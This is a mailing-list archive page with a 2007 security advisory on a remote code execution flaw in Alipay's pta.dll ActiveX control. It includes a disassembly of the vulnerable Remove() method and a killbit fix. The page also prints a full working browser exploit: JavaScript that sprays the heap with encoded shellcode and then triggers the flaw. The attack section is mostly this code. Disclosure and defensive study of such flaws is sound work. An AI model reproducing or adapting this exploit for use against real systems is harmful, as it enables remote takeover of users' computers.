Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] Alibaba Alipay Code Execute Vulnerability (Remove Method)

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] Alibaba Alipay Code Execute Vulnerability (Remove Method)
Date: 7 Feb 2007 11:14:52 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Alibaba Alipay Code Execute Vulnerability (Remove Method)
------------------------------------------------------------------------


SUMMARY

 <https://www.alipay.com> Alipay is "China s leading online payment 
service, and a division of Alibaba.com. It enables individuals and 
businesses to securely, easily and quickly send and receive payments 
online. Alipay works like an escrow service, solving the issue of 
settlement risk in China".

There exists a remote code execute vulnerability in alipay's password 
input control "pta.dll". A remote attacker who successfully exploit these 
vulnerabilities can completely take control of the affected system.

DETAILS

This vulnerability exist in the function "Remove()" educed by "pta.dll", 
following are some related information:
    InprocServer32: pta.dll
    ClassID : 66F50F46-70A0-4A05-BD5E-FBCC0F9641EC

    [id(0x60030001), helpstring("method Remove")]
    void Remove([in] int idx);

Let's see How function "Remove()" process the parameter "idx"

        .text:10003D4E ; Remove
        .text:10003D4E
        .text:10003D4E sub_10003D4E proc near ; DATA XREF: 
rdata:1000B3A4#o
        .text:10003D4E ; .rdata:1000B41C#o ...
        .text:10003D4E
        .text:10003D4E arg_0 = dword ptr 4
        .text:10003D4E arg_4 = dword ptr 8
        .text:10003D4E
        .text:10003D4E mov eax, [esp+arg_4]
        .text:10003D52 test eax, eax
        .text:10003D54 jl short loc_10003D78
        .text:10003D56 push esi
        .text:10003D57 mov esi, [esp+4+arg_0] ; get idx
        .text:10003D5B shl eax, 4 ; idx << 4
        .text:10003D5E add eax, [esi+8] ; [esi+8]=0
        .text:10003D61 push edi ;
        .text:10003D62 mov edi, eax ; idx << 4 ==>edi
        .text:10003D64 mov eax, [edi+8] ; [(idx << 4)+8] ==>eax
        .text:10003D67 push eax
        .text:10003D68 mov ecx, [eax] ; [[(idx << 4)+8]]==>ecx
        .text:10003D6A call dword ptr [ecx+8] ; [[[(idx << 4)+8]]+8]==>jmp 
addr
        .text:10003D6D push edi
        .text:10003D6E lea ecx, [esi+4]
        .text:10003D71 call sub_10003F35
        .text:10003D76 pop edi
        .text:10003D77 pop esi
        .text:10003D78
        .text:10003D78 loc_10003D78: ; CODE XREF: sub_10003D4E+6#j
        .text:10003D78 xor eax, eax
        .text:10003D7A retn 8
        .text:10003D7A sub_10003D4E endp

The idx is a DWORD vaule what we can control, so we can complete an 
interesting attack, for example when we set the idx 0x41414141, the 
procedure will execute codes of address [[[14141410h+8]]+8].

Solution:
Set a killbit for "pta.dll", or, delete %system%\aliedit\pta.dll if you do 
not use Alipay.

Disclosure Timeline:
2007.02.07 - Advisory release

Exploit:
/************************************************************************************************
Alipay ActiveX Remote Code Execute Exploit,enjoy it:)
by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net
*************************************************************************************************/

<html>
<head>
<OBJECT ID="com" 
CLASSID="CLSID:{66F50F46-70A0-4A05-BD5E-FBCC0F9641EC}"></OBJECT>
</head>
<body>

<SCRIPT language="javascript">

function ClickForRunCalc()
{
    var heapSprayToAddress = 0x0d0d0d0d;

    var payLoadCode = 
unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + 
"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + 
"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + "%u9090" +
"%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF" +
"%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0" + 
"%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" + 
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01" + 
"%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040" + 
"%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB" + 
"%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889" + 
"%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57" + 
"%u63E7%u6C61%u0063");


    var heapBlockSize = 0x400000;

    var payLoadSize = payLoadCode.length * 2;

    var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

    var spraySlide = unescape("%u0d0d%u0d0d");
    spraySlide = getSpraySlide(spraySlide,spraySlideSize);

    heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

    memory = new Array();

    for (i=0;i<heapBlocks;i++)
    {
        memory[i] = spraySlide + payLoadCode;
    }

    com.Remove(0x00d0d0d0);

    function getSpraySlide(spraySlide, spraySlideSize)
    {
        while (spraySlide.length*2<spraySlideSize)
        {
            spraySlide += spraySlide;
        }
        spraySlide = spraySlide.substring(0,spraySlideSize/2);
        return spraySlide;
    }

}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:frankruder@hotmail.com> 
ruder cocoruder.
The original article can be found at:  <http://ruder.cdut.net> 
http://ruder.cdut.net



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] Alibaba Alipay Code Execute Vulnerability (Remove Method), SecuriTeam <=
Previous by Date:  [UNIX] PS Information Leak on HP True64 Alpha OSF1, SecuriTeam
Next by Date:  [NT] Blue Coat Systems WinProxy CONNECT Method Heap Overflow Vulnerability, SecuriTeam
Previous by Thread:  [UNIX] PS Information Leak on HP True64 Alpha OSF1, SecuriTeam
Next by Thread:  [NT] Blue Coat Systems WinProxy CONNECT Method Heap Overflow Vulnerability, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]